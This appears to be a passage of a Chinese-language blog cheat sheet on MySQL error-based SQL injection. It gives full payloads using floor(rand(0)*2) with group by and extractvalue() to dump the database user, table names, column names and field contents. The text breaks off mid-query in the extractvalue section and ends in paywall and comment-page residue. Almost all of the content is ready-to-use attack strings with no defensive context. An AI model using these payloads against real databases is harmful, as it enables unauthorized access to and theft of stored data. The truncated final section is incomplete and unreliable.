1、floor()
收集数据库信息:user()、database()....
select * from user where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
爆表:
select * from user where id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),'~',(table_name))x from information_schema.tables group by x)a);
爆字段:
select * from user where id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),'~',(column_name))x from information_schema.columns group by x)a);
字段内容:
select * from user where id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2),'~',(字段名))x from 表名 group by x)a);
产生报错的原理:https://www.2cto.com/article/201604/498394.html
2、extractvalue()
MySQL 5.1.5 以后可以用
select * from user where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
爆表名:
select * from user where
最低0.47元/天 解锁文章
扫一扫
9749
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
